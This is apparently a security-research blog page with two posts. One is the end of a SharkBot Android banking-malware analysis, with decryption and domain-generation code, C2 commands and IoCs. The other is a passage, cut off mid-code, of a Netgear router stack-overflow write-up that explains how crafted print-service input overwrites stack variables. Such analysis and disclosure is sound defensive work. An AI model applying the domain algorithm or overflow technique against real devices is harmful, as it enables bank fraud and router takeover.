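    # Pseudo-random generation algorithm (PRGA), XORed with the data
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def build_request(payload: bytes, wrap_key) -> dict:
    """Build the rkey/rdata pair described in the text.

    wrap_key is a hypothetical callable standing in for encryption with the
    hardcoded RSA public key; the key length of 16 bytes is an assumption.
    """
    key = os.urandom(16)  # fresh random RC4 key for every request
    return {"rkey": wrap_key(key), "rdata": rc4(key, payload)}
```

Once the per-request RC4 key is known (for instance recovered from an instrumented sample), calling `rc4(key, rdata)` returns the JSON payload.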

If we take a look at the decrypted payload, we can see how SharkBot is simply using JSON to send different information about the infected device and receive the commands to be executed from the C2. In the following image we can see the decrypted RC4 payload which has been sent from an infected device.

Two important fields sent in the requests are:

  • ownerID
  • botnetID

Those parameters are hardcoded and have the same value in the analyzed samples. We think those values can be used in the future to identify different buyers of this malware, which based on our investigation is not being sold in underground forums yet.

Domain Generation Algorithm

SharkBot includes one or two domains/URLs which should be registered and working, but in case the hardcoded C2 servers were taken down, it also includes a Domain Generation Algorithm (DGA) to be able to communicate with a new C2 server in the future.

The DGA concatenates the current date and a specific suffix string (‘pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf’), encodes the result in base64, and takes the first 19 characters. It then appends different TLDs to generate the final candidate domains.

The date elements used are:

  • Week of the year (v1.get(3) in the code)
  • Year (v1.get(1) in the code)

It uses the ‘+’ operator, but since the week of the year and the year are Integers, they are added instead of appended, so for example: for the second week of 2022, the generated string to be base64 encoded is: 2 + 2022 + “pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf” = 2024 + “pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf” = “2024pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf”.

Previous versions of SharkBot (from November-December 2021) used only the current week of the year to generate the domain. Adding the year to the generation algorithm seems to be an update to better support the new year, 2022.
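The algorithm described above can be re-implemented in a few lines of Python for generating candidate domains to block or hunt for. This is a sketch, not the malware's Java code. Lowercasing the label and using only the `.xyz` TLD are assumptions based on the domains listed in the IoCs section, and the week number is passed in explicitly because the week-of-year calculation depends on the device's calendar settings.

```python
import base64
from typing import List, Optional, Sequence

SUFFIX = "pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf"


def dga_label(week: int, year: Optional[int] = None) -> str:
    """Return the 19-character domain label for a given week (and year).

    With year=None this follows the older, week-only variant.
    """
    # The integers are summed, not concatenated, before the suffix is appended.
    seed = week if year is None else week + year
    raw = "{}{}".format(seed, SUFFIX).encode("ascii")
    # Assumption: the label is lowercased, as seen in the listed C2 domains.
    return base64.b64encode(raw).decode("ascii")[:19].lower()


def dga_candidates(week: int, year: Optional[int] = None,
                   tlds: Sequence[str] = (".xyz",)) -> List[str]:
    """Append each TLD to the label; the TLD list here is an assumption."""
    label = dga_label(week, year)
    return [label + tld for tld in tlds]
```

Under these assumptions, `dga_label(7, 2022)` gives `mjayoxbvakjjouxir0z` and `dga_label(7)` gives `n3bvakjjouxir0zkzmd`, which match the two C2 domains in the IoCs section.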

Commands

SharkBot can receive different commands from the C2 server in order to execute different actions on the infected device, such as sending text messages, downloading files, showing injections, etc. The list of commands it can receive and execute is as follows:

  • smsSend: used to send a text message to the specified phone number by the TAs
  • updateLib: used to request that the malware download a new JAR file from the specified URL, which should contain an updated version of the malware
  • updateSQL: used to send the SQL query to be executed in the SQLite database which Sharkbot uses to save the configuration of the malware (injections, etc.)
  • stopAll: used to reset/stop the ATS feature, stopping the in progress automation.
  • updateConfig: used to send an updated config to the malware.
  • uninstallApp: used to uninstall the specified app from the infected device
  • changeSmsAdmin: used to change the SMS manager app
  • getDoze: used to check if the permissions to ignore battery optimization are enabled, and show the Android settings to disable them if they aren’t
  • sendInject: used to show an overlay to steal user’s credentials
  • getNotify: used to show the Notification Listener settings if they are not enabled for the malware. With these permissions enabled, SharkBot will be able to intercept notifications and send them to the C2
  • APP_STOP_VIEW: used to close the specified app, so every time the user tries to open that app, the Accessibility Service will close it
  • downloadFile: used to download one file from the specified URL
  • updateTimeKnock: used to update the last request timestamp for the bot
  • localATS: used to enable ATS attacks. It includes a JSON array with the different events/actions it should simulate to perform ATS (button clicks, etc.)

Automatic Transfer System

One of the distinctive parts of SharkBot is that it uses a technique known as Automatic Transfer System (ATS). ATS is a relatively new technique used by banking malware for Android.

To summarize, ATS can be compared with webinjects, only serving a different purpose. Rather than gathering credentials for use/scale, it uses the credentials to automatically initiate wire transfers on the endpoint itself (so without needing to log in, and bypassing 2FA or other anti-fraud measures). However, it is very individually tailored and requires quite some maintenance for each bank, amount, money mule, etc. This is probably one of the reasons ATS isn’t that popular amongst (Android) banking malware.

How does it work?

Once a target logs into their banking app, the malware receives an array of events (clicks/touches, button presses, gestures, etc.) to be simulated in a specific order. Those events are used to simulate the interaction of the victim with the banking app to make money transfers, as if the user were making the transfer themselves.

This way, the money transfer is made from the victim’s device by simulating different events, which makes the fraud much more difficult for fraud detection systems to detect.

IoCs

Sample Hashes:

  • a56dacc093823dc1d266d68ddfba04b2265e613dcc4b69f350873b485b9e1f1c (Google Play SharkBotDropper)
  • 9701bef2231ecd20d52f8fd2defa4374bffc35a721e4be4519bda8f5f353e27a (Dropped SharkBot v1.64.1)
  • 20e8688726e843e9119b33be88ef642cb646f1163dce4109b8b8a2c792b5f9fc (Google play SharkBot dropper)
  • 187b9f5de09d82d2afbad9e139600617685095c26c4304aaf67a440338e0a9b6 (Google play SharkBot dropper)
  • e5b96e80935ca83bbe895f6239eabca1337dc575a066bb6ae2b56faacd29dd (Google play SharkBot dropper)

SharkBotDropper C2:

  • hxxp://statscodicefiscale[.]xyz/stats/

‘Auto/Direct Reply’ URL used to distribute the malware:

  • hxxps://bit[.]ly/34ArUxI

Google Play Store URL:

C2 servers/Domains for SharkBot:

  • n3bvakjjouxir0zkzmd[.]xyz (185.219.221.99)
  • mjayoxbvakjjouxir0z[.]xyz (185.219.221.99)

RSA Public Key used to encrypt RC4 key in SharkBot:

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2R7nRj0JMouviqMisFYt0F2QnScoofoR7svCcjrQcTUe7tKKweDnSetdz1A+PLNtk7wKJk+SE3tcVB7KQS/WrdsEaE9CBVJ5YmDpqGaLK9qZhAprWuKdnFU8jZ8KjNh8fXyt8UlcO9ABgiGbuyuzXgyQVbzFfOfEqccSNlIBY3s+LtKkwb2k5GI938X/4SCX3v0r2CKlVU5ZLYYuOUzDLNl6KSToZIx5VSAB3VYp1xYurRLRPb2ncwmunb9sJUTnlwypmBCKcwTxhsFVAEvpz75opuMgv8ba9Hs0Q21PChxu98jNPsgIwUn3xmsMUl0rNgBC3MaPs8nSgcT4oUXaVwIDAQAB

RSA Public Key used to encrypt RC4 Key in the Google Play SharkBotDropper:

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9qo1QgM8FH7oAkCLkNO5XfQBUdl+pI4u2tvyFiZZ6hMZ07QnlYazgRmWcC5j5H2iV+74gQ9+1cgjnVSszGbIwVJOQAEZGRpSFT7BhAhA4+PTjH6CCkiyZTk7zURvgBCrXz6+B1XH0OcD4YUYs4OGj8Pd2KY6zVocmvcczkwiU1LEDXo3PxPbwOTpgJL+ySWUgnKcZIBffTiKZkry0xR8vD/d7dVHmZnhJS56UNefegm4aokHPmvzD9p9n3ez1ydzfLJARb5vg0gHcFZMjf6MhuAeihFMUfLLtddgo00Zs4wFay2mPYrpn2x2pYineZEzSvLXbnxuUnkFqNmMV4UJwIDAQAB

BrokenPrint: A Netgear stack overflow

28 February 2022 at 12:43

Summary

This blog post describes a stack-based overflow vulnerability found and exploited in September 2021 by Alex Plaskett, Cedric Halbronn and Aaron Adams working in the Exploit Development Group (EDG) of NCC Group. The vulnerability was patched in the firmware update referenced in the following Netgear advisory.

The vulnerability is in the KC_PRINT service (/usr/bin/KC_PRINT), running by default on the Netgear R6700v3 router. Although it is a default service, the vulnerability is only reachable if the ReadySHARE feature is turned on, which means a printer is physically connected to the Netgear router through a USB port. No additional configuration is needed, so the default configuration is exploitable as soon as a printer is connected to the router.

This vulnerability can be exploited on the LAN side of the router and does not need authentication. It allows an attacker to get remote code execution as the admin user (highest privileges) on the router.

Our exploitation method is very similar to what was used in the Tokyo Drift paper i.e. we chose to change the admin password and start utelnetd service, which allowed us to then get a privileged shell on the router.

We have analysed and exploited the vulnerability on the V1.0.4.118_10.0.90 version, which we detail below, but older versions are likely vulnerable too.

Note: The Netgear R6700v3 router is based on the ARM (32-bit) architecture.

We have named our exploit "BrokenPrint". This is because "KC" is pronounced like "cassé" in French which means "broken" in English.

Vulnerability details

Background on ReadySHARE

This video explains well what ReadySHARE is; in short, it allows a USB printer to be accessed through the Netgear router as if it were a network printer.

Reaching the vulnerable memcpy()

The KC_PRINT binary does not have symbols but has a lot of logging/error functions which contain some function names. The code shown below is decompiled code from IDA/Hex-Rays as no open source has been found for this binary.

The KC_PRINT binary creates lots of threads to handle different features:

The first thread handler we are interested in is ipp_server() at address 0xA174. We see it listens on port 631, and when it accepts a client connection, it creates a new thread handled by thread_handle_client_connection() at address 0xA4B4 and passes the client socket to this new thread.

void __noreturn ipp_server()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  addr_len = 0x10;
  optval = 1;
  kc_client = 0;
  pthread_attr_init(&attr);
  pthread_attr_setdetachstate(&attr, 1);
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if ( sock < 0 )
  {
    ...
  }
  if ( setsockopt(sock, 1, SO_REUSEADDR, &optval, 4u) < 0 )
  {
    ...
  }
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = 2;
  sin.sin_addr.s_addr = htonl(0);
  sin.sin_port = htons(631u);                   // listens on TCP 631
  if ( bind(sock, (const struct sockaddr *)&sin, 0x10u) < 0 )
  {
    ...
  }

  // listen with a backlog of up to 128 pending connections
  listen(sock, 128);
  while ( g_enabled )
  {
    client_sock = accept(sock, &addr, &addr_len);
    if ( client_sock >= 0 )
    {
      update_count_client_connected(CLIENT_CONNECTED);
      val[0] = 60;
      val[1] = 0;
      if ( setsockopt(client_sock, 1, SO_RCVTIMEO, val, 8u) < 0 )
        perror("ipp_server: setsockopt SO_RCVTIMEO failed");
      kc_client = (kc_client *)malloc(sizeof(kc_client));
      if ( kc_client )
      {
        memset(kc_client, 0, sizeof(kc_client));
        kc_client->client_sock = client_sock;
        pthread_mutex_lock(&g_mutex);
        thread_index = get_available_client_thread_index();
        if ( thread_index < 0 )
        {
          pthread_mutex_unlock(&g_mutex);
          free(kc_client);
          kc_client = 0;
          close(client_sock);
          update_count_client_connected(CLIENT_DISCONNECTED);
        }
        else if ( pthread_create(
                    &g_client_threads[thread_index],
                    &attr,
                    (void *(*)(void *))thread_handle_client_connection,
                    kc_client) )
        {
          ...
        }
        else
        {
          pthread_mutex_unlock(&g_mutex);
        }
      }
      else
      {
        ...
      }
    }
  }
  close(sock);
  pthread_attr_destroy(&attr);
  pthread_exit(0);
}

The client handler calls into do_http at address 0xA530:

void __fastcall __noreturn thread_handle_client_connection(kc_client *kc_client)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  client_sock = kc_client->client_sock;
  while ( g_enabled && !do_http(kc_client) )
    ;
  close(client_sock);
  update_count_client_connected(CLIENT_DISCONNECTED);
  free(kc_client);
  pthread_exit(0);
}

The do_http() function reads an HTTP-like request into a 1024-byte stack buffer until it finds the end of the HTTP headers (\r\n\r\n). It then searches for a POST /USB URI followed by an _LQ string, with an integer usblp_index in between. It then calls into is_printer_connected() at 0x16150.

The is_printer_connected() function is not shown for brevity; it opens the /proc/printer_status file, tries to read its content, and tries to find a USB port by looking for a string like usblp%d. This string will only be found if a printer is connected to the Netgear router, meaning execution never continues further if no printer is connected.

unsigned int __fastcall do_http(kc_client *kc_client)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  kc_client_ = kc_client;
  client_sock = kc_client->client_sock;
  content_len = 0xFFFFFFFF;
  strcpy(http_continue, "HTTP/1.1 100 Continue\r\n\r\n");
  pCurrent = 0;
  pUnderscoreLQ_or_CRCL = 0;
  p_client_data = 0;
  kc_job = 0;
  strcpy(aborted_by_system, "aborted-by-system");
  remaining_len = 0;
  kc_chunk = 0;

  // buf_read is on the stack and is 1024 bytes
  memset(buf_read, 0, sizeof(buf_read));

  // Read in 1024 bytes maximum
  count_read = readUntil_0d0a_x2(client_sock, (unsigned __int8 *)buf_read, 0x400);
  if ( (int)count_read <= 0 )
    return 0xFFFFFFFF;

  // if received "100-continue", sends back "HTTP/1.1 100 Continue\r\n\r\n"
  if ( strstr(buf_read, "100-continue") )
  {
    ret_1 = send(client_sock, http_continue, 0x19u, 0);
    if ( ret_1 <= 0 )
    {
      perror("do_http() write 100 Continue xx");
      return 0xFFFFFFFF;
    }
  }

  // If POST /USB is found
  pCurrent = strstr(buf_read, "POST /USB");
  if ( !pCurrent )
    return 0xFFFFFFFF;
  pCurrent += 9;                                // points after "POST /USB"

  // If _LQ is found
  pUnderscoreLQ_or_CRCL = strstr(pCurrent, "_LQ");
  if ( !pUnderscoreLQ_or_CRCL )
    return 0xFFFFFFFF;
  Underscore = *pUnderscoreLQ_or_CRCL;
  *pUnderscoreLQ_or_CRCL = 0;
  usblp_index = atoi(pCurrent);                 
  *pUnderscoreLQ_or_CRCL = Underscore;
  if ( usblp_index > 10 )                    
    return 0xFFFFFFFF;

  // by default, will exit here as no printer connected
  if ( !is_printer_connected(usblp_index) )
    return 0xFFFFFFFF;                          // exit if no printer connected

  kc_client_->usblp_index = usblp_index;
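The header checks in this excerpt can be modelled in Python to see which request lines get as far as is_printer_connected(). This is a rough sketch of the logic shown in the decompilation, not a re-implementation of KC_PRINT: `c_atoi` only approximates C's atoi(), the function names are made up for this example, and only the upper bound visible in the decompiled code is reproduced.

```python
import re
from typing import Optional


def c_atoi(text: str) -> int:
    """Approximate C atoi(): skip whitespace, optional sign, leading digits."""
    match = re.match(r"\s*([+-]?\d+)", text)
    return int(match.group(1)) if match else 0


def parse_usblp_index(headers: str) -> Optional[int]:
    """Return the printer index from the headers, or None if rejected."""
    start = headers.find("POST /USB")
    if start < 0:
        return None
    rest = headers[start + len("POST /USB"):]  # same as pCurrent += 9
    end = rest.find("_LQ")
    if end < 0:
        return None
    index = c_atoi(rest[:end])
    if index > 10:  # the only bound checked in the excerpt
        return None
    return index
```

For example, `parse_usblp_index("POST /USB1_LQ HTTP/1.1\r\n\r\n")` returns 1, while a request for `/USB11_LQ` is rejected.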

It then parses the HTTP Content-Length header and starts by reading 8 bytes from the HTTP content. Depending on values of these 8 bytes, it calls into do_airippWithContentLength() at 0x128C0 which is the one we are interested in.

  // /!\ does not read from pCurrent
  pCurrent = strstr(buf_read, "Content-Length: ");
  if ( !pCurrent )
  {
    // Handle chunked HTTP encoding
    ...
  }

  // no chunk encoding here, normal http request
  pCurrent += 0x10;
  pUnderscoreLQ_or_CRCL = strstr(pCurrent, "\r\n");
  if ( !pUnderscoreLQ_or_CRCL )
    return 0xFFFFFFFF;
  Underscore = *pUnderscoreLQ_or_CRCL;
  *pUnderscoreLQ_or_CRCL = 0;
  content_len = atoi(pCurrent);
  *pUnderscoreLQ_or_CRCL = Underscore;
  memset(recv_buf, 0, sizeof(recv_buf));
  count_read = recv(client_sock, recv_buf, 8u, 0);// 8 bytes are read only initially
  if ( count_read != 8 )
    return 0xFFFFFFFF;
  if ( (recv_buf[2] || recv_buf[3] != 2) && (recv_buf[2] || recv_buf[3] != 6) )
  {
    ret_1 = do_airippWithContentLength(kc_client_, content_len, recv_buf);
    if ( ret_1 < 0 )
      return 0xFFFFFFFF;
    return 0;
  }
  ...

The do_airippWithContentLength() function allocates a heap buffer to hold the entire HTTP content, copies the 8 bytes already read into it, and reads the remaining bytes into that new heap buffer.

Note: there is no limit on the actual HTTP content size as long as malloc() does not fail due to insufficient memory, which will be useful later to spray memory.

Then, still depending on the values of the 8 bytes initially read, it calls into additional functions. We are interested in Response_Get_Jobs() at 0x102C4, which contains the stack-based overflow we are going to exploit. Note that other Response_XXX() functions contain similar stack overflows, but Response_Get_Jobs() seemed the most straightforward to exploit, so we targeted this function.

unsigned int __fastcall do_airippWithContentLength(kc_client *kc_client, int content_len, char *recv_buf_initial)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  client_sock = kc_client->client_sock;
  recv_buf2 = malloc(content_len);
  if ( !recv_buf2 )
    return 0xFFFFFFFF;
  memcpy(recv_buf2, recv_buf_initial, 8u);
  if ( toRead(client_sock, recv_buf2 + 8, content_len - 8) >= 0 )
  {
    if ( recv_buf2[2] || recv_buf2[3] != 0xB )
    {
      if ( recv_buf2[2] || recv_buf2[3] != 4 )
      {
        if ( recv_buf2[2] || recv_buf2[3] != 8 )
        {
          if ( recv_buf2[2] || recv_buf2[3] != 9 )
          {
            if ( recv_buf2[2] || recv_buf2[3] != 0xA )
            {
              if ( recv_buf2[2] || recv_buf2[3] != 5 )
                Job = Response_Unk_1(kc_client, recv_buf2);
              else
                // recv_buf2[3] == 0x5
                Job = Response_Create_Job(kc_client, recv_buf2, content_len);
            }
            else
            {
              // recv_buf2[3] == 0xA
              Job = Response_Get_Jobs(kc_client, recv_buf2, content_len);
            }
          }
          else
          {
            ...
}
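The nested comparisons on bytes 2 and 3 amount to a dispatch on a 16-bit big-endian value in the first 8 bytes of the body. The Python sketch below makes that explicit. Only Create_Job (5) and Get_Jobs (0xA) are named in the decompilation; mapping the other values to standard IPP operation names, and reading the 8 bytes as an IPP version, operation-id and request-id, are assumptions based on the service listening on port 631.

```python
import struct

# Values compared against bytes 2..3 in do_http() and do_airippWithContentLength().
# Names other than Create-Job and Get-Jobs follow the standard IPP operation-ids
# and are an assumption, not something recovered from the binary.
OPERATIONS = {
    0x0002: "Print-Job",
    0x0004: "Validate-Job",
    0x0005: "Create-Job",
    0x0006: "Send-Document",
    0x0008: "Cancel-Job",
    0x0009: "Get-Job-Attributes",
    0x000A: "Get-Jobs",
    0x000B: "Get-Printer-Attributes",
}


def classify(header8: bytes) -> str:
    """Name the handler selected by the first 8 bytes of the HTTP content."""
    if len(header8) < 8:
        raise ValueError("need at least 8 bytes")
    # Assumed layout: 2-byte version, 2-byte operation-id, 4-byte request-id.
    _version, operation_id, _request_id = struct.unpack(">HHI", header8[:8])
    return OPERATIONS.get(operation_id, "other")
```

A body starting with bytes `02 00 00 0A` would therefore be routed to Response_Get_Jobs(), the function analysed next.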

The first part of the vulnerable Response_Get_Jobs() function code is shown below:

// recv_buf was allocated on the heap
unsigned int __fastcall Response_Get_Jobs(kc_client *kc_client, unsigned __int8 *recv_buf, int content_len)
{
  char command[64]; // [sp+24h] [bp-1090h] BYREF
  char suffix_data[2048]; // [sp+64h] [bp-1050h] BYREF
  char job_data[2048]; // [sp+864h] [bp-850h] BYREF
  unsigned int error; // [sp+1064h] [bp-50h]
  size_t copy_len; // [sp+1068h] [bp-4Ch]
  int copy_len_1; // [sp+106Ch] [bp-48h]
  size_t copied_len; // [sp+1070h] [bp-44h]
  size_t prefix_size; // [sp+1074h] [bp-40h]
  int in_offset; // [sp+1078h] [bp-3Ch]
  char *prefix_ptr; // [sp+107Ch] [bp-38h]
  int usblp_index; // [sp+1080h] [bp-34h]
  int client_sock; // [sp+1084h] [bp-30h]
  kc_client *kc_client_1; // [sp+1088h] [bp-2Ch]
  int offset_job; // [sp+108Ch] [bp-28h]
  char bReadAllJobs; // [sp+1093h] [bp-21h]
  char is_job_media_sheets_completed; // [sp+1094h] [bp-20h]
  char is_job_state_reasons; // [sp+1095h] [bp-1Fh]
  char is_job_state; // [sp+1096h] [bp-1Eh]
  char is_job_originating_user_name; // [sp+1097h] [bp-1Dh]
  char is_job_name; // [sp+1098h] [bp-1Ch]
  char is_job_id; // [sp+1099h] [bp-1Bh]
  char suffix_copy1_done; // [sp+109Ah] [bp-1Ah]
  char flag2; // [sp+109Bh] [bp-19h]
  size_t final_size; // [sp+109Ch] [bp-18h]
  int offset; // [sp+10A0h] [bp-14h]
  size_t response_len; // [sp+10A4h] [bp-10h]
  char *final_ptr; // [sp+10A8h] [bp-Ch]
  size_t suffix_offset; // [sp+10ACh] [bp-8h]

  kc_client_1 = kc_client;
  client_sock = kc_client->client_sock;
  usblp_index = kc_client->usblp_index;
  suffix_offset = 0;                            // offset in the suffix_data[] stack buffer
  in_offset = 0;
  final_ptr = 0;
  response_len = 0;
  offset = 0;                                   // offset in the client data "recv_buf" array
  final_size = 0;
  flag2 = 0;
  suffix_copy1_done = 0;
  is_job_id = 0;
  is_job_name = 0;
  is_job_originating_user_name = 0;
  is_job_state = 0;
  is_job_state_reasons = 0;
  is_job_media_sheets_completed = 0;
  bReadAllJobs = 0;

  // prefix_ptr is a heap allocated buffer to copy some bytes
  // from the client input but is not super useful from an
  // exploitation point of view
  prefix_size = 74;                             // size of prefix_ptr[] heap buffer
  prefix_ptr = (char *)malloc(74u);
  if ( !prefix_ptr )
  {
    perror("Response_Get_Jobs: malloc xx");
    return 0xFFFFFFFF;
  }
  memset(prefix_ptr, 0, prefix_size);

  // copy bytes indexes 0 and 1 from client data
  copied_len = memcpy_at_index(prefix_ptr, in_offset, &recv_buf[offset], 2u);
  in_offset += copied_len;

  // we make sure to avoid this condition to be validated
  // so we keep bReadAllJobs == 0
  if ( *recv_buf == 1 && !recv_buf[1] )
    bReadAllJobs = 1;
  offset += 2;

  // set prefix_ptr's bytes index 2 and 3 to 0x00
  prefix_ptr[in_offset++] = 0;
  prefix_ptr[in_offset++] = 0;
  offset += 2;

  // copy bytes indexes 4,5,6,7 from client data
  in_offset += memcpy_at_index(prefix_ptr, in_offset, &recv_buf[offset], 4u);
  offset += 4;
  copy_len_1 = 0x42;

  // copy 0x42 bytes from table keywords into indexes [8,73]
  copied_len = memcpy_at_index(prefix_ptr, in_offset, &table_keywords, 0x42u);
  in_offset += copied_len;
  ++offset;                                     // offset = 9 after this

  // job_data[] and suffix_data[] are 2 stack buffers to copy some bytes
  // from the client input but are not super useful from an
  // exploitation point of view
  memset(job_data, 0, sizeof(job_data));
  memset(suffix_data, 0, sizeof(suffix_data));
  suffix_data[suffix_offset++] = 5;

  // we need to enter this to trigger the stack overflow
  if ( !bReadAllJobs )
  {
    // iteration 1: offset == 9
    // NOTE: we make sure to overwrite the "offset" local variable
    // to be content_len+1 when overflowing the stack buffer to exit this loop after the 1st iteration
    while ( recv_buf[offset] != 3 && offset <= content_len )
    {
      // we make sure to enter this as we need flag2 != 0 later
      // to trigger the stack overflow
      if ( recv_buf[offset] == 0x44 && !flag2 )
      {
        flag2 = 1;
        suffix_data[suffix_offset++] = 0x44;

        // we can set a copy_len == 0 to simplify this
        // offset = 9 here
        copy_len = (recv_buf[offset + 1] << 8) + recv_buf[offset + 2];
        copied_len = memcpy_at_index(suffix_data, suffix_offset, &recv_buf[offset + 1], copy_len + 2);
        suffix_offset += copied_len;
      }
      ++offset;                                 // iteration 1: offset = 10 after this


      // this is the same copy_len as above but just used to skip bytes here
      // offset = 10 here
      copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];
      offset += 2 + copy_len;                   // we can set a copy_len == 0 to simplify this
                                                // iteration 1: offset = 12 after this

      // again, copy_len is pulled from client controlled data,
      // this time used in a copy onto a stack buffer
      // copy_len equals maximum: 0xff00 + 0xff
      // and a copy is made into command[] which is a 64-byte buffer
      copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];
      offset += 2;                              // iteration 1: offset = 14 after this

      // we need flag2 == 1 to enter this
      if ( flag2 )
      {
        // /!\ VULNERABILITY HERE /!\
        memset(command, 0, sizeof(command));
        memcpy(command, &recv_buf[offset], copy_len);// VULN: stack overflow here
        ...

The function starts by allocating a prefix_ptr heap buffer to hold a few bytes from the client data. Depending on client data bytes 0 and 1, it may set bReadAllJobs = 1, which we want to avoid in order to reach the vulnerable memcpy(), so we make sure bReadAllJobs remains 0.

Above we see 2 memset() calls for 2 stack buffers that we named job_data and suffix_data. We then enter the if ( !bReadAllJobs ) block. We craft the client data to make sure we satisfy the while ( recv_buf[offset] != 3 && offset <= content_len ) condition and enter the loop.

We also need to set flag2 = 1 so we make sure to validate the conditions on the client data to enter the if ( recv_buf[offset] == 0x44 && !flag2 ) condition.

Later inside the while loop, a 16-bit size (maximum 0xffff = 65535 bytes) is read from the client data in copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];. If flag2 is set, this size is then used as the length argument to memcpy() when copying into a 64-byte stack buffer in memcpy(command, &recv_buf[offset], copy_len). This is a stack-based buffer overflow where we control both the overflowing size and content. There is no restriction on the byte values used for the overflow, which makes it a very nice vulnerability to exploit at first sight.
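The length handling can be mirrored in a few lines of Python to make the numbers concrete. This is only an illustrative sketch: decode_len() and overflow_amount() are hypothetical helper names, the sample bytes are made up, and the 64-byte size is the one quoted above for command[].

```python
COMMAND_BUF_SIZE = 64  # size of command[] as stated in the text


def decode_len(buf: bytes, offset: int) -> int:
    """Mirror of: copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1]."""
    return (buf[offset] << 8) + buf[offset + 1]


def overflow_amount(copy_len: int) -> int:
    """Bytes written past the end of command[] (0 when the copy fits)."""
    return max(0, copy_len - COMMAND_BUF_SIZE)


# Hypothetical client bytes: the largest length the 2-byte field can encode.
sample = bytes([0xFF, 0xFF])
copy_len = decode_len(sample, 0)
print(hex(copy_len), overflow_amount(copy_len))
```

A legitimate command name such as "job-id" fits well within the buffer, so only an oversized length field triggers the overflow.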

Since there is no stack cookie, the strategy to exploit this stack overflow is to overwrite the saved return address on the stack and continue execution until the end of the function to get $pc control.

Reaching the end of the function

It is now important to look at the stack layout, starting from the command[] array we are overflowing. As can be seen below, command[] is the local variable that is furthest away from the return address. This has the advantage of letting us control the value of every other local variable post-overflow. Remember that we are inside the while loop at this point, so the initial idea is to get out of this loop as soon as possible. By overwriting local variables with appropriate values, this should be easy.

-00001090 command         DCB 64 dup(?)
-00001050 suffix_data     DCB 2048 dup(?)
-00000850 job_data        DCB 2048 dup(?)
-00000050 error           DCD ?
-0000004C copy_len        DCD ?
-00000048 copy_len_1      DCD ?
-00000044 copied_len      DCD ?
-00000040 prefix_size     DCD ?
-0000003C in_offset       DCD ?
-00000038 prefix_ptr      DCD ?                   ; offset
-00000034 usblp_index     DCD ?
-00000030 client_sock     DCD ?
-0000002C kc_client_1     DCD ?
-00000028 offset_job      DCD ?
-00000024                 DCB ? ; undefined
-00000023                 DCB ? ; undefined
-00000022                 DCB ? ; undefined
-00000021 bReadAllJobs    DCB ?
-00000020 is_job_media_sheets_completed DCB ?
-0000001F is_job_state_reasons DCB ?
-0000001E is_job_state    DCB ?
-0000001D is_job_originating_user_name DCB ?
-0000001C is_job_name     DCB ?
-0000001B is_job_id       DCB ?
-0000001A suffix_copy1_done DCB ?
-00000019 flag2           DCB ?
-00000018 final_size      DCD ?
-00000014 offset          DCD ?
-00000010 response_len    DCD ?
-0000000C final_ptr       DCD ?                   ; offset
-00000008 suffix_offset   DCD ?
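As a rough aid for reading this layout, the distance in bytes from the start of command[] to a given local can be computed directly from the frame offsets. The sketch below only copies a handful of offsets from the listing above; the FRAME dictionary and distance_from_command() are hypothetical names, and nothing is assumed about where the saved registers or the return address sit.

```python
# Frame-relative offsets copied from the stack layout above.
FRAME = {
    "command": -0x1090,
    "prefix_size": -0x40,
    "prefix_ptr": -0x38,
    "client_sock": -0x30,
    "bReadAllJobs": -0x21,
    "flag2": -0x19,
    "offset": -0x14,
}


def distance_from_command(name: str) -> int:
    """Number of bytes between the start of command[] and the named local."""
    return FRAME[name] - FRAME["command"]


for name in ("prefix_size", "prefix_ptr", "client_sock", "offset"):
    print(f"{name:12s} is {distance_from_command(name):#x} bytes into the overflow")
```

With these offsets, the "offset" local sits 0x107c bytes past the start of command[], so an overflow long enough to reach it also passes over prefix_size, prefix_ptr and client_sock on the way.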

To simplify the code paths taken after our overflowing memcpy(), we craft the client data so that it holds the "job-id" command. Then we see the offset += copy_len statement. Since we control both the copy_len and offset values due to our overflow, we can craft values that make us exit the loop condition while ( recv_buf[offset] != 3 && offset <= content_len ), for instance by setting offset = content_len+1.

Next, the 2nd read_job_value() call is executed because bReadAllJobs == 0. The internals of read_job_value() are not relevant for us, but its purpose is to loop over all the printer's jobs and save the requested data (in our case it would be the job-id). We assume there is no print job at the moment, so nothing will be read. This means the offset_job being returned is 0.

  // we need to enter this to trigger the stack overflow
  if ( !bReadAllJobs )
  {
    // iteration 1: offset == 9
    // NOTE: we make sure to overwrite the "offset" local variable
    // to be content_len+1 when overflowing the stack buffer to exit this loop after the 1st iteration
    while ( recv_buf[offset] != 3 && offset <= content_len )
    {
      ...
      // we need flag2 == 1 to enter this
      if ( flag2 )
      {
        // /!\ VULNERABILITY HERE /!\
        memset(command, 0, sizeof(command));
        memcpy(command, &recv_buf[offset], copy_len);// VULN: stack overflow here

        // dispatch to right command 
        if ( !strcmp(command, "job-media-sheets-completed") )
        {
          is_job_media_sheets_completed = 1;
        }
        ...
        else if ( !strcmp(command, "job-id") )
        {
          // atm we make sure to send a "job-id\0" command to go here
          is_job_id = 1;
        }
        else
        {
          ...
        }
      }
      offset += copy_len;                       // this is executed before looping
    }                                           // end of while loop
  }

  final_size += prefix_size;
  if ( bReadAllJobs )
    offset_job = read_job_value(usblp_index, 1, 1, 1, 1, 1, 1, job_data);
  else
    offset_job = read_job_value(
                   usblp_index,
                   is_job_id,
